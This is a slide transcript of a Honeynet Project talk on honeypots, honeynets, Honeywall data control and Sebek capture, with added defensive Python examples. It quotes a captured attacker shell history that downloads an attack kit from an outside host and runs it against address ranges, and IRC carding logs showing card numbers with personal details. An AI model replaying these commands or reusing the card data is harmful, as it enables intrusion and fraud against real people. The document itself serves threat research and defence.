DFN-CERT: Forschung, Beratung, Dienstleistungen für IT ... (DFN-CERT: research, consulting and services for IT)
Slide transcript
Honeynets and The Honeynet Project
Speaker
• Lance Spitzner, President, Honeynet Project
• Passion is research and development in honeypot-related technologies.
• Nine years in security, four with Sun Microsystems as Senior Security Architect.
• Author of Honeypots and co-author of Know Your Enemy: 2nd Edition.
Purpose
To explain the Honeynet Project, what we have learned, and what honeynets are.
Agenda
• The Project and Research Alliance
• Examples of Research
• How Honeynets Work
• Learning More
Honeynet Project
Problem
How can we defend against an enemy when we don't even know who the enemy is?
One Possible Solution
To learn the tools, tactics, and motives of the blackhat community, and share the lessons learned.
Honeynet Project
• Volunteer organization of security professionals.
• Open source: we share all of our research and findings.
• Deploy networks around the world to be hacked.
• Everything we capture is happening in the wild.
• We have no agenda, no employees, and nothing to sell.
Goals
• Awareness: to raise awareness of the threats that exist.
• Information: for those already aware, to teach and inform about the threats.
• Research: to give organizations the capabilities to learn more on their own.
Project Organization
• Non-profit (501(c)(3)) organization
• Board of Directors
• No more than two members from any organization.
• Funded by the community, including the NIC.
• Diverse set of skills and experiences.
• Team works virtually, from around the world.
Honeynet Research Alliance
Started in 2002, the Alliance is a forum of organizations around the world actively researching, sharing and deploying honeynet technologies.
http://www.honeynet.org/alliance/
Alliance Members
• South Florida Honeynet Project
• Georgia Technical Institute
• Azusa Pacific University
• Paladion Networks Honeynet Project (India)
• Internet Systematics Lab Honeynet Project (Greece)
• Mexico Honeynet (Mexico)
• Honeynet.BR (Brazil)
• Irish Honeynet
• Norwegian Honeynet
• UK Honeynet
• French Honeynet Project
• Italian Honeynet Project
• German Honeynet Project
• Spanish Honeynet Project
• Singapore Honeynet Project
Examples of Research
What we have captured
• The Honeynet Project has captured primarily external threats that focus on targets of opportunity.
• Little has yet been captured on advanced threats; few honeynets to date have been designed to capture them.
The Threat
• Hundreds of scans a day.
• Fastest time a honeypot was manually compromised: 15 minutes (by a worm: under 60 seconds).
• Life expectancies: a vulnerable Win32 system is under three hours, a vulnerable Linux system is three months.
• Primarily cyber-crime, focused on Win32 platforms and their users.
• Attackers can control thousands, if not hundreds of thousands, of systems.
• Only getting worse, because the crime pays and is becoming highly organized.
Who am I?
That Was Then
Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y
Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L
Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120
Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
This is Now
BOTs
DDoS for Money
J4ck: why don't you start charging for packet attacks?
J4ck: "give me x amount and I'll take bla bla offline for this amount of time"
J1LL: it was illegal last I checked
J4ck: heh, then everything you do is illegal. Why not make money off of it?
J4ck: I know plenty of people that'd pay exorbatent amounts for packeting
Credit Cards Exchanging
04:55:16 COCO_JAA: !cc
04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (AllThis ccs update everyday From My Hacked shopping Database - You mustregular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9)
04:55:42 COCO_JAA: !cclimit 4407070000588951
04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard(5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
04:56:55 COCO_JAA: !cardablesite
04:57:22 COCO_JAA: !cardable electronics
04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics :*** 9(11 TraDecS Chk_bot FoR #goldcard9)
04:58:09 COCO_JAA: !cclimit 4234294391131136
04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) :9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
How Honeynets Work
Honeypots
• A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.
• It has no production value, so anything going to or from a honeypot is likely a probe, attack or compromise.
• Its primary value to most organizations is information.
Advantages
• Collect small data sets of high value.
• Reduce false positives.
• Catch new attacks (false negatives of other sensors).
• Work in encrypted or IPv6 environments.
• Simple concept requiring minimal resources.
Disadvantages
• Limited field of view (a microscope, not a radar).
• Risk (mainly with high-interaction honeypots).
Types
• Low-interaction
  • Emulates services, applications, and operating systems.
  • Low risk and easy to deploy and maintain, but captures limited information.
• High-interaction
  • Real services, applications, and operating systems.
  • Captures extensive information, but high risk and time-intensive to maintain.
Examples of Honeypots (ordered from low interaction to high interaction)
• BackOfficer Friendly
• KFSensor
• Honeyd
• Honeynets
Honeynets
• A high-interaction honeypot designed to capture in-depth information.
• The information has different value to different organizations.
• It is an architecture you populate with live systems, not a product or software.
• Any traffic entering or leaving is suspect.
How it works
A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed.
• Data Control
• Data Capture
http://www.honeynet.org/papers/honeynet/
Honeynet - GenII
Diagram: No Data Control. The Internet connects directly to the honeypots; traffic has no restrictions in either direction.
Diagram: Data Control. A Honeywall sits between the Internet and the honeypots. Inbound traffic: no restrictions. Outbound traffic: connections limited, packets scrubbed.
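The data-control policy from the two diagrams, as an added example that is not Honeynet Project code: inbound traffic to a honeypot is never restricted (it is the probe or attack we want to see; it is also what "any traffic entering or leaving is suspect" means in practice), while outbound traffic from a honeypot is allowed only up to a per-protocol budget per time window so a compromised honeypot cannot be turned against third parties. The real Honeywall enforced this with iptables connection counting and scrubbed packets with an inline IDS; packet scrubbing is not modelled here. The honeypot addresses, the per-protocol limits, the one-hour window and the flow sample are all assumptions constructed for the example.

```python
"""Honeywall-style data control over constructed flow records (added example)."""
from collections import Counter, defaultdict
from dataclasses import dataclass

HONEYPOTS = {"10.0.0.10", "10.0.0.11"}                 # assumed honeypot addresses
OUTBOUND_LIMITS = {"tcp": 15, "udp": 20, "icmp": 50}   # assumed per-window budgets
WINDOW_SECONDS = 3600                                  # assumed sliding window


@dataclass(frozen=True)
class Flow:
    ts: int      # seconds since an arbitrary epoch
    proto: str   # "tcp", "udp" or "icmp"
    src: str
    dst: str


def direction(flow):
    """Classify a flow relative to the honeynet."""
    src_hp, dst_hp = flow.src in HONEYPOTS, flow.dst in HONEYPOTS
    if src_hp and not dst_hp:
        return "outbound"
    if dst_hp and not src_hp:
        return "inbound"
    return "internal" if src_hp else "unrelated"


class DataControl:
    def __init__(self, limits=OUTBOUND_LIMITS, window=WINDOW_SECONDS):
        self.limits = limits
        self.window = window
        # (honeypot, proto) -> timestamps of outbound connections already allowed
        self._allowed = defaultdict(list)

    def decide(self, flow):
        kind = direction(flow)
        if kind == "inbound":
            return "ALLOW", "inbound: unrestricted, but log it; it is a probe or attack"
        if kind == "internal":
            return "ALLOW", "honeypot-to-honeypot traffic stays inside the honeynet"
        if kind == "unrelated":
            return "IGNORE", "not honeynet traffic"
        # Outbound: the honeypot is most likely compromised. Allow a few
        # connections so the attacker can fetch tools and reveal intent,
        # then drop the rest. Sliding window per (honeypot, protocol).
        key = (flow.src, flow.proto)
        recent = [t for t in self._allowed[key] if flow.ts - t < self.window]
        self._allowed[key] = recent
        limit = self.limits.get(flow.proto, 0)
        if len(recent) < limit:
            recent.append(flow.ts)
            return "ALLOW", f"outbound {flow.proto} {len(recent)}/{limit} in window"
        return "DROP", f"outbound {flow.proto} budget {limit}/window exhausted"


def decide_all(flows):
    dc = DataControl()
    return [dc.decide(f) for f in flows]


def summarize(flows):
    return dict(Counter(action for action, _ in decide_all(flows)))


# Constructed sample: two inbound scans, a compromised honeypot opening 17 TCP
# connections within a minute, one UDP connection, a flow that does not touch
# the honeynet, and one more TCP connection an hour later.
SAMPLE_FLOWS = (
    [Flow(0, "tcp", "203.0.113.5", "10.0.0.10"), Flow(1, "tcp", "203.0.113.5", "10.0.0.11")]
    + [Flow(100 + i, "tcp", "10.0.0.10", f"198.51.100.{i}") for i in range(17)]
    + [Flow(120, "udp", "10.0.0.10", "198.51.100.53")]
    + [Flow(200, "tcp", "192.0.2.1", "192.0.2.2")]
    + [Flow(100 + WINDOW_SECONDS + 1, "tcp", "10.0.0.10", "198.51.100.99")]
)

if __name__ == "__main__":
    for flow, (action, why) in zip(SAMPLE_FLOWS, decide_all(SAMPLE_FLOWS)):
        print(f"{flow.ts:>5} {flow.proto:<4} {flow.src:>12} -> {flow.dst:<15} {action:<6} {why}")
    print(summarize(SAMPLE_FLOWS))
```

Run over the sample, the first 15 outbound TCP connections pass and the 16th and 17th are dropped, the UDP connection draws on its own budget, and the connection an hour later is allowed again because the window has slid. Two design points carry over to a real deployment: the budget is per protocol and per honeypot, so one noisy honeypot cannot exhaust the allowance of another, and the decision for inbound traffic is always to allow and record, never to block, since blocking would hide exactly the activity the honeynet exists to observe.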
Data Capture - Sebek
• Hidden kernel module that captures all activity.
• Dumps the captured activity to the network.
• The module hides its own traffic from the honeypot: packets matching its magic number and destination port are dropped before any local sniffer sees them, so the attacker cannot observe the capture.
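Both halves of the Sebek design above, as an added example that is not Sebek's own code: the record the kernel module emits, the hiding rule that keeps those packets away from a sniffer running on the honeypot, and the Honeywall-side decoder that reassembles keystrokes per process. The 56-byte header follows the Sebek 3 layout as I recall it (magic, version, type, counter, time, parent pid, pid, uid, fd, inode, 12-byte command name, data length); treat the exact field order as an assumption. The magic value and destination port are per-deployment build settings in the real module; the values here are arbitrary. The keystrokes are constructed and mirror one command from the HISTORY log earlier in the deck.

```python
"""Sebek-style data capture: encode, hide locally, decode on the Honeywall (added example)."""
import struct
from collections import defaultdict

SEBEK_MAGIC = 0xD0D0D0D0   # assumed; chosen per deployment in the real module
SEBEK_DST_PORT = 1101      # assumed; chosen per deployment in the real module
SBK_READ = 0               # record type: data returned by read(), i.e. keystrokes
HEADER = struct.Struct(">IHH" + "I" * 8 + "12sI")   # 56 bytes, network byte order


def encode_record(counter, pid, uid, fd, com, data, ts=(1104000000, 0), ppid=1, inode=0):
    """One capture record as the kernel module would emit it inside a UDP datagram."""
    hdr = HEADER.pack(SEBEK_MAGIC, 3, SBK_READ, counter, ts[0], ts[1],
                      ppid, pid, uid, fd, inode, com.encode()[:12], len(data))
    return hdr + data


def is_sebek(payload, magic=SEBEK_MAGIC):
    return len(payload) >= 4 and struct.unpack(">I", payload[:4])[0] == magic


def local_sniffer_view(packets, port=SEBEK_DST_PORT):
    """What a sniffer running *on the honeypot* gets to see.

    The module hooks packet reception and discards anything addressed to the
    Sebek port that carries the magic number, so an attacker who runs tcpdump
    on the compromised box cannot observe the capture traffic. Everything
    else passes through untouched. Packets are (src_ip, dst_port, payload).
    """
    return [(src, dport, payload) for src, dport, payload in packets
            if not (dport == port and is_sebek(payload))]


def decode_records(packets, port=SEBEK_DST_PORT):
    """Honeywall side: reassemble keystrokes per (honeypot, pid, uid)."""
    sessions = defaultdict(bytearray)
    for src, dport, payload in packets:
        if dport != port or len(payload) < HEADER.size or not is_sebek(payload):
            continue
        f = HEADER.unpack_from(payload)
        rec_type, pid, uid, length = f[2], f[7], f[8], f[12]
        if rec_type != SBK_READ:
            continue
        sessions[(src, pid, uid)] += payload[HEADER.size:HEADER.size + length]
    return {k: bytes(v).decode("ascii", errors="replace") for k, v in sessions.items()}


# Constructed sample: a root shell (pid 1246) typing one command, one keystroke
# per record, plus an unrelated DNS packet that a local sniffer must still see.
KEYSTROKES = b"cd luckroot\n"
SAMPLE_PACKETS = [
    ("10.0.0.10", SEBEK_DST_PORT, encode_record(i, 1246, 0, 0, "bash", bytes([b])))
    for i, b in enumerate(KEYSTROKES)
] + [("10.0.0.10", 53, b"\x12\x34\x01\x00 constructed dns query")]

if __name__ == "__main__":
    print("tcpdump on the honeypot sees", len(local_sniffer_view(SAMPLE_PACKETS)), "packet(s)")
    for (host, pid, uid), text in decode_records(SAMPLE_PACKETS).items():
        print(f"{host} PID={pid} UID={uid} {text!r}")
```

The hiding rule only blinds a sniffer on the honeypot itself; another host on the same segment sees the records, which is why the Honeywall, not the honeypot, is where they are collected. The same rule is also a fingerprint: a module that silently drops specific packets behaves differently from a clean kernel, and that difference is the kind of thing the "detection and anti-honeynet technologies" mentioned later in the deck look for.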
Bootable CDROM
Distributed Capabilities
Issues
• Require extensive resources to properly maintain.
• Detection and anti-honeynet technologies have been introduced.
• Can be used to attack or harm other, non-honeynet systems.
• Privacy can be a potential issue.
Legal Contact for .mil/.gov
Department of Justice, Computer Crime and Intellectual Property Section.
• Paul Ohm
• Number: (202) 514-1026
• E-Mail: [address redacted in source]
Learning More
Challenges
The opportunity to study real attacks on your own, compare your analysis with others, and learn about blackhats.
• Scan of the Month challenges
• Forensic Challenge
• Reverse Challenge
http://www.honeynet.org/misc/
Know Your Enemy papers
• Series of papers dedicated to honeynet research and its findings.
• Translated into over 10 different languages.
http://www.honeynet.org/papers/
Know Your Enemy: 2nd Edition
http://www.honeynet.org/book
Contributing
YOU?
Advanced Network Management Lab
How to contribute
• Volunteer!
• Honeywall CDROM subscription
• PayPal donation
• Buy our book
• Funding
http://www.honeynet.org/funds/
Conclusion
• The Honeynet Project is a non-profit, volunteer organization researching cyber threats using honeynet technologies, and sharing the lessons learned.
• It is hoped our research can improve the awareness and security of the Internet community.